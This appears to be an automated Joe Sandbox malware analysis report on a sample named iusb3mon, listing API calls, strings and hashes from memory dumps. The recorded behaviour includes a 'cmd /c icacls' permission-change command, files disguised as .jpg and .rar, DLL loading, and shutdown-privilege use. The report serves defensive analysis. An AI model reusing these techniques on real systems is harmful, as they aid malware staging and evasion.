Part of subcall function 06298FF7: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 0629901F
Part of subcall function 06298FF7: GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 0629902A
Part of subcall function 06298FF7: GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 06299035
Part of subcall function 06298FF7: LoadLibraryA.KERNEL32(kernel32.dll,?,062939FA,SeShutdownPrivilege,00000001,?,0629200F,?), ref: 0629903F
Part of subcall function 06298FF7: GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 0629904A
Part of subcall function 06298FF7: LoadLibraryA.KERNEL32(KERNEL32.dll), ref: 06299092
Part of subcall function 06298FF7: GetProcAddress.KERNEL32(00000000,GetLastError), ref: 0629909A
Part of subcall function 06298FF7: CloseHandle.KERNEL32(?), ref: 062990A9
Part of subcall function 06298FF7: FreeLibrary.KERNEL32(00000000), ref: 062990BA
Part of subcall function 06298FF7: FreeLibrary.KERNEL32(00000000), ref: 062990C5

ExitWindowsEx.USER32(?,00000000), ref: 06293A02

Strings

SeShutdownPrivilege, xrefs: 062939ED, 062939F4, 06293A0A

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressLibraryProc$Load$Free$CloseExitHandleWindows
String ID: SeShutdownPrivilege
API String ID: 3789203340-3733053543
Opcode ID: 4aeca403d00f3ab7f20b6db66f62c0cf08f566b0cdb64d63e54f93e988a67d57
Instruction ID: 0815f1076e292ec338d822bdbebfd427e2f8df51d1ba06e07dc86b7f316ace26
Opcode Fuzzy Hash: 4aeca403d00f3ab7f20b6db66f62c0cf08f566b0cdb64d63e54f93e988a67d57
Instruction Fuzzy Hash: E1D0C93316D7A03DF99522147C0BBC963869B82730F24582AFA25680C05E9A28C106AD

Function 062500CD Relevance: 2.6, Strings: 2, Instructions: 87COMMON

Download Yara Rule

Strings

l, xrefs: 0625018C
ntdl, xrefs: 06250185

Memory Dump Source

Source File: 0000001E.00000002.4680057945.0000000006250000.00000040.00001000.00020000.00000000.sdmp, Offset: 06250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6250000_iusb3mon.jbxd

Yara matches

Similarity

API ID:
String ID: l$ntdl
API String ID: 0-924918826
Opcode ID: c362b51c53e3eeabca090c6237b61e6bcf708d1a3817c6eecd03a2daff8ddda5
Instruction ID: a66a8329ea09df2cb9e0564cac0dc2933483bdeb2e74472e60ffae7746225b3b
Opcode Fuzzy Hash: c362b51c53e3eeabca090c6237b61e6bcf708d1a3817c6eecd03a2daff8ddda5
Instruction Fuzzy Hash: D0218F71A205219F8BA99F148CA8A2F7BA6EF49710756819AEC059F354EB34C902C7D1

Function 0035817A Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.4665809368.0000000000341000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00340000, based on PE: true

Associated: 0000001E.00000002.4665515553.0000000000340000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666146444.000000000035E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666408946.000000000036C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666641264.000000000036E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666973971.00000000003A2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667717172.00000000003A3000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003D1000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003D3000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000419000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000421000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000423000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000425000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000042F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000441000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000443000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000445000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000447000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000449000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000451000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000045F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000462000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000467000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000469000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000471000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000473000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000497000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000049C000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4678100485.000000000072F000.00000020.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_340000_iusb3mon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4752ed74c6e0d5fc0635c5e9ee1919fb5ee4d4faf056dc546268fc3d4a948d2d
Instruction ID: 7743e5d95603b0f3fa698f1e1f02bd559aecdf946a9df5e15f71220da94219d1
Opcode Fuzzy Hash: 4752ed74c6e0d5fc0635c5e9ee1919fb5ee4d4faf056dc546268fc3d4a948d2d
Instruction Fuzzy Hash: 50E04632911628EBCB16DB88C904E8AB3ECEB44B02B120096B901E3220C670DF05C7D0

Function 0034DB1C Relevance: .0, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.4665809368.0000000000341000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00340000, based on PE: true

Associated: 0000001E.00000002.4665515553.0000000000340000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666146444.000000000035E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666408946.000000000036C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666641264.000000000036E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666973971.00000000003A2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667717172.00000000003A3000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003D1000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003D3000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000419000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000421000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000423000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000425000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000042F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000441000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000443000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000445000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000447000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000449000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000451000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000045F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000462000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000467000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000469000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000471000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000473000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000497000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000049C000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4678100485.000000000072F000.00000020.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_340000_iusb3mon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 694cbe831bc19fd0730d4c407680a11a69efbe1f69b7222d89b60d0701cb05dc
Instruction ID: 5dcd86e1cd44d39c56b3377fe173cc10bd06376c090a8640c5131955eb117f30
Opcode Fuzzy Hash: 694cbe831bc19fd0730d4c407680a11a69efbe1f69b7222d89b60d0701cb05dc
Instruction Fuzzy Hash: 95C08C74100D0086CE2B8A10C2F17A43394E392782FC2068CC8034FA46C99EAC87EB00

Function 06292772 Relevance: 78.9, APIs: 16, Strings: 29, Instructions: 173filesleeplibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 06292A15: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,c:\inst.ini,?,?,06292661,c:\inst.ini), ref: 06292A2B
Part of subcall function 06292A15: WriteFile.KERNEL32(00000000,C:\\rar.exe,0000000B,?,00000000,?,06292661,c:\inst.ini), ref: 06292A40
Part of subcall function 06292A15: CloseHandle.KERNEL32(00000000,?,06292661,c:\inst.ini), ref: 06292A4D

Part of subcall function 06291C74: SetFileAttributesA.KERNEL32(00000000,00000080,0629682E,C:\ProgramData\Microsoft\Program\ziliao.jpg,00000000), ref: 06291C88

Sleep.KERNEL32(000003E8,?,?,00000000,?,?), ref: 062927B0
DeleteFileA.KERNEL32(C:\ProgramData\upx.rar,?,?,00000000,?,?), ref: 062927B9
DeleteFileA.KERNEL32(C:\ProgramData\Data\upx.rar,?,?,00000000,?,?), ref: 062927BC
Sleep.KERNEL32(000003E8,?,?,00000000,?,?), ref: 062927C3
GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,00000000,?,?), ref: 062927D3
LoadLibraryA.KERNEL32(0000004B,?,?,?,00000000,?,?), ref: 06292849
GetProcAddress.KERNEL32(00000000), ref: 06292850
GetTickCount.KERNEL32 ref: 0629289E
GetTickCount.KERNEL32 ref: 062928D9
lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?), ref: 06292901
CreateFileA.KERNEL32(C:\ProgramData\data\upx.rar,40000000,00000002,00000000,00000002,00000080,00000000,?,?,?,?,?,?,00000000,?,?), ref: 0629291E
WriteFile.KERNEL32(00000025,?,Ru%d%s,?,00000000,?,?,?,?,?,?,00000000,?,?), ref: 06292956
CloseHandle.KERNEL32(00000025,?,?,?,?,?,?,00000000,?,?), ref: 0629295F
Sleep.KERNEL32(000001F4,?,?,?,?,?,?,00000000,?,?), ref: 0629296A
DeleteFileA.KERNEL32(c:\tzfz,?,?,?,?,?,?,00000000,?,?), ref: 0629297B
GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,00000000,?,?), ref: 0629299E

Strings

m, xrefs: 0629282D
t, xrefs: 0629283D
C:\ProgramData\upx.rar, xrefs: 06292795, 0629279C, 062927B2
K, xrefs: 062927E4
KERNEL32.dll, xrefs: 062927E9, 062927EC
A, xrefs: 06292845
c:\tzfz, xrefs: 0629277E, 06292976
Ru%d%s, xrefs: 0629293B, 06292941
l, xrefs: 06292815
t, xrefs: 06292821
L, xrefs: 062927FD
h, xrefs: 06292841
P, xrefs: 06292835
p, xrefs: 06292831
.dll, xrefs: 06292942
E, xrefs: 062927ED
C:\ProgramData\Data\upx.rar, xrefs: 06292788, 0629278F, 062927BB, 0629296E
a, xrefs: 06292839
R, xrefs: 062927F1
e, xrefs: 06292829
N, xrefs: 062927F5
Plugin32.dll, xrefs: 062928A5, 062928A8
e, xrefs: 0629281D
G, xrefs: 06292819
l, xrefs: 06292811
T, xrefs: 06292825
.dll, xrefs: 06292932
C:\ProgramData\data\upx.rar, xrefs: 06292919
E, xrefs: 062927F9

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$DeleteSleep$AttributesCloseCountCreateHandleTickWrite$AddressLibraryLoadModuleNameProclstrcat
String ID: .dll$.dll$A$C:\ProgramData\Data\upx.rar$C:\ProgramData\data\upx.rar$C:\ProgramData\upx.rar$E$E$G$K$KERNEL32.dll$L$N$P$Plugin32.dll$R$Ru%d%s$T$a$c:\tzfz$e$e$h$l$l$m$p$t$t
API String ID: 3823570417-1872799604
Opcode ID: 35037f75d7cfa1b2af47cac3792c13dcfd24846ac664ab0356cf335e39351a07
Instruction ID: d9da05f7837ec9fd7b7c1dbca3493d92e7400a709a0629b88192876d0698a694
Opcode Fuzzy Hash: 35037f75d7cfa1b2af47cac3792c13dcfd24846ac664ab0356cf335e39351a07
Instruction Fuzzy Hash: 1E7181319183C9EAEF01DBA8DC4DBDE7FA95F16304F044189E6946A1C2C7FA4648CB76

Function 06292750 Relevance: 77.2, APIs: 15, Strings: 29, Instructions: 173filesleeplibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 06292A15: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,c:\inst.ini,?,?,06292661,c:\inst.ini), ref: 06292A2B
Part of subcall function 06292A15: WriteFile.KERNEL32(00000000,C:\\rar.exe,0000000B,?,00000000,?,06292661,c:\inst.ini), ref: 06292A40
Part of subcall function 06292A15: CloseHandle.KERNEL32(00000000,?,06292661,c:\inst.ini), ref: 06292A4D

Part of subcall function 06291C74: SetFileAttributesA.KERNEL32(00000000,00000080,0629682E,C:\ProgramData\Microsoft\Program\ziliao.jpg,00000000), ref: 06291C88

Sleep.KERNEL32(000003E8,?,?,00000000,?,?), ref: 062927B0
DeleteFileA.KERNEL32(C:\ProgramData\upx.rar,?,?,00000000,?,?), ref: 062927B9
DeleteFileA.KERNEL32(C:\ProgramData\Data\upx.rar,?,?,00000000,?,?), ref: 062927BC
Sleep.KERNEL32(000003E8,?,?,00000000,?,?), ref: 062927C3
GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,00000000,?,?), ref: 062927D3
LoadLibraryA.KERNEL32(0000004B,?,?,?,00000000,?,?), ref: 06292849
GetProcAddress.KERNEL32(00000000), ref: 06292850
GetTickCount.KERNEL32 ref: 0629289E
GetTickCount.KERNEL32 ref: 062928D9
lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?), ref: 06292901
CreateFileA.KERNEL32(C:\ProgramData\data\upx.rar,40000000,00000002,00000000,00000002,00000080,00000000,?,?,?,?,?,?,00000000,?,?), ref: 0629291E
WriteFile.KERNEL32(00000025,?,Ru%d%s,?,00000000,?,?,?,?,?,?,00000000,?,?), ref: 06292956
CloseHandle.KERNEL32(00000025,?,?,?,?,?,?,00000000,?,?), ref: 0629295F
Sleep.KERNEL32(000001F4,?,?,?,?,?,?,00000000,?,?), ref: 0629296A
DeleteFileA.KERNEL32(c:\tzfz,?,?,?,?,?,?,00000000,?,?), ref: 0629297B
GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,00000000,?,?), ref: 0629299E

Strings

m, xrefs: 0629282D
t, xrefs: 0629283D
C:\ProgramData\upx.rar, xrefs: 06292795, 0629279C, 062927B2
K, xrefs: 062927E4
KERNEL32.dll, xrefs: 062927E9, 062927EC
A, xrefs: 06292845
c:\tzfz, xrefs: 0629277E, 06292976
Ru%d%s, xrefs: 0629293B, 06292941
l, xrefs: 06292815
t, xrefs: 06292821
L, xrefs: 062927FD
h, xrefs: 06292841
P, xrefs: 06292835
p, xrefs: 06292831
.dll, xrefs: 06292942
E, xrefs: 062927ED
C:\ProgramData\Data\upx.rar, xrefs: 06292788, 0629278F, 062927BB, 0629296E
a, xrefs: 06292839
R, xrefs: 062927F1
e, xrefs: 06292829
N, xrefs: 062927F5
Plugin32.dll, xrefs: 062928A5, 062928A8
e, xrefs: 0629281D
G, xrefs: 06292819
l, xrefs: 06292811
T, xrefs: 06292825
.dll, xrefs: 06292932
C:\ProgramData\data\upx.rar, xrefs: 06292919
E, xrefs: 062927F9

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$DeleteSleep$AttributesCloseCountCreateHandleTickWrite$AddressLibraryLoadModuleNameProclstrcat
String ID: .dll$.dll$A$C:\ProgramData\Data\upx.rar$C:\ProgramData\data\upx.rar$C:\ProgramData\upx.rar$E$E$G$K$KERNEL32.dll$L$N$P$Plugin32.dll$R$Ru%d%s$T$a$c:\tzfz$e$e$h$l$l$m$p$t$t
API String ID: 3823570417-1872799604
Opcode ID: add132b3ca6557c7770ea14a3e7caf5a4b229d16c832978b7774cfbb529aee9f
Instruction ID: 3e5e328a8789c7f7467f97b016d5d0019748692cccb30e08b7b4a4098cac7340
Opcode Fuzzy Hash: add132b3ca6557c7770ea14a3e7caf5a4b229d16c832978b7774cfbb529aee9f
Instruction Fuzzy Hash: 9D6190308183C9EEEF029BA8DC4DBDE7F659F16304F044189E6846A1C2C7FA4649CB76

Function 06291C8F Relevance: 73.7, APIs: 21, Strings: 21, Instructions: 200filesleeplibraryCOMMON

Download Yara Rule

APIs

WinExec.KERNEL32(cmd /c icacls "C:\ProgramData\Microsoft\Program" /remove:d Everyone",00000000), ref: 06291CA3

Part of subcall function 06291C74: SetFileAttributesA.KERNEL32(00000000,00000080,0629682E,C:\ProgramData\Microsoft\Program\ziliao.jpg,00000000), ref: 06291C88

Sleep.KERNEL32(000003E8), ref: 06291CDF
DeleteFileA.KERNEL32(C:\ProgramData\Microsoft\Program\ziliao.jpg1), ref: 06291CEC
DeleteFileA.KERNEL32(C:\ProgramData\Microsoft\Program\ziliao.jpg), ref: 06291CEF
DeleteFileA.KERNEL32(C:\ProgramData\Microsoft\Program\ziliao), ref: 06291CF6
DeleteFileA.KERNEL32(C:\ProgramData\Microsoft\ziliao.jpg), ref: 06291CFD
Sleep.KERNEL32(000003E8), ref: 06291D04
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 06291D18
LoadLibraryA.KERNEL32(0000004B,?), ref: 06291D8C
GetProcAddress.KERNEL32(00000000), ref: 06291D93
GetTickCount.KERNEL32 ref: 06291DDF
GetTickCount.KERNEL32 ref: 06291E17
lstrcatA.KERNEL32(?,?), ref: 06291E3F
CreateFileA.KERNEL32(C:\ProgramData\Microsoft\Program\ziliao.jpg,40000000,00000002,00000000,00000002,00000080,00000000), ref: 06291E56
WriteFile.KERNEL32(00000025,?,Ru%d%s,?,00000000), ref: 06291E8A
CloseHandle.KERNEL32(00000025), ref: 06291E93
Sleep.KERNEL32(000003E8), ref: 06291E9E
ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 06291ECA
TerminateProcess.KERNEL32(00000000), ref: 06291ED7
ExitProcess.KERNEL32 ref: 06291EDE
GetFileAttributesA.KERNEL32(?), ref: 06291F05

Strings

C:\ProgramData\Microsoft\ziliao.jpg, xrefs: 06291CCD, 06291CF8
t, xrefs: 06291D7D
e, xrefs: 06291D69
C:\ProgramData\Microsoft\Program\ziliao.jpg1, xrefs: 06291CA9, 06291CAF, 06291CE5
e, xrefs: 06291D5D
p, xrefs: 06291D71
Plugin32.dll, xrefs: 06291DE6, 06291DE9
t, xrefs: 06291D61
open, xrefs: 06291EC4
a, xrefs: 06291D79
P, xrefs: 06291D75
C:\ProgramData\Microsoft\Program\ziliao, xrefs: 06291CC2, 06291CF1
C:\ProgramData\Microsoft\Program\ziliao.jpg, xrefs: 06291CB5, 06291CBB, 06291CEE, 06291E55, 06291EA5, 06291EAC
m, xrefs: 06291D6D
A, xrefs: 06291D85
KERNEL32.dll, xrefs: 06291D26
cmd /c icacls "C:\ProgramData\Microsoft\Program" /remove:d Everyone", xrefs: 06291C9E
Ru%d%s, xrefs: 06291E74, 06291E7A
h, xrefs: 06291D81
T, xrefs: 06291D65
G, xrefs: 06291D59

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$Delete$Sleep$AttributesCountProcessTick$AddressCloseCreateExecExecuteExitHandleLibraryLoadModuleNameProcShellTerminateWritelstrcat
String ID: A$C:\ProgramData\Microsoft\Program\ziliao$C:\ProgramData\Microsoft\Program\ziliao.jpg$C:\ProgramData\Microsoft\Program\ziliao.jpg1$C:\ProgramData\Microsoft\ziliao.jpg$G$KERNEL32.dll$P$Plugin32.dll$Ru%d%s$T$a$cmd /c icacls "C:\ProgramData\Microsoft\Program" /remove:d Everyone"$e$e$h$m$open$p$t$t
API String ID: 1333362825-3008771302
Opcode ID: 55f71b3aac9799ce643f269bd739559e7985349f8f510e1508f5a5b0d323194d
Instruction ID: bd7d043758e07361dab8bc6621abf7b15082ae39641881dbc16a5a140ecadf0c
Opcode Fuzzy Hash: 55f71b3aac9799ce643f269bd739559e7985349f8f510e1508f5a5b0d323194d
Instruction Fuzzy Hash: 858193718042C9EEEF429BB4DC4CBEE7F799F16304F044189E69466181C7B94A49CB76

Function 0629739A Relevance: 60.1, APIs: 1, Strings: 39, Instructions: 79COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 06297480

Part of subcall function 062991B3: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00000000,00000000,00000000), ref: 06299216
Part of subcall function 062991B3: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 0629922E
Part of subcall function 062991B3: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 0629923E
Part of subcall function 062991B3: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 0629924E
Part of subcall function 062991B3: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 0629925B
Part of subcall function 062991B3: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 06299268
Part of subcall function 062991B3: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 062993F3

Strings

S, xrefs: 062973F5
\, xrefs: 0629744D
S, xrefs: 06297441
r, xrefs: 06297415
n, xrefs: 0629741D
C, xrefs: 06297425
r, xrefs: 06297435
Console, xrefs: 06297493
\, xrefs: 06297471
e, xrefs: 06297445
r, xrefs: 06297459
u, xrefs: 0629740D
o, xrefs: 06297439
o, xrefs: 06297429
S, xrefs: 06297451
e, xrefs: 06297455
M, xrefs: 06297401
E, xrefs: 062973FD
\, xrefs: 06297405
C, xrefs: 06297409
Y, xrefs: 062973F1
c, xrefs: 06297465
s, xrefs: 06297479
%, xrefs: 06297475
t, xrefs: 06297449
S, xrefs: 062973ED
v, xrefs: 0629745D
t, xrefs: 06297431
lSet\Services\%s, xrefs: 06297487
t, xrefs: 06297421
e, xrefs: 06297419
e, xrefs: 06297469
n, xrefs: 0629742D
lSet\Services\%s, xrefs: 062973A5
r, xrefs: 06297411
i, xrefs: 06297461
l, xrefs: 0629743D
T, xrefs: 062973F9
s, xrefs: 0629746D

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

